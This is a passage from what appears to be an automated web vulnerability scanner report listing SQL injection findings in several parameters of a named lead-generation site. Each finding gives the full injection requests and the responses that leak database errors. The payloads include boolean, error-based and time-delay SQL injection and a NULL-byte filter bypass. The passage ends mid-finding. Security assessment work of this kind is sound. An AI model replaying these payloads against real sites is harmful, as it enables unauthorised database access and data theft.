HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:24:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.362. http://www.insideup.com/ppc/leadflow/hins00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. The payload 10197964'%20or%201%3d1--%20 was submitted in the button3 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit10197964'%20or%201%3d1--%20&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7382
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
_t=3&attributeId_556_t=3&button3=Submit10197964' or 1=1-- &companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.363. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002'&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=700te5tae9e6m5j6dvv9fg1p93; path=/
Content-Length: 4094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002'&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002''&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 2

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ilippmafikbfn49428thcqd8o7; path=/
Content-Length: 3917
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.364. http://www.insideup.com/ppc/leadflow/hins00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the companyname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6ici7jm3r4g2ukrsfkfdetur45; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.365. http://www.insideup.com/ppc/leadflow/hins00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.366. http://www.insideup.com/ppc/leadflow/hins00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:27:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:27:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.367. http://www.insideup.com/ppc/leadflow/hins00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emailaddress parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

1.368. http://www.insideup.com/ppc/leadflow/hins00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email%00'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=07qmhv62qk4sfsmmd3lokt8pq3; path=/
Content-Length: 7326
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email.'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

Request 2

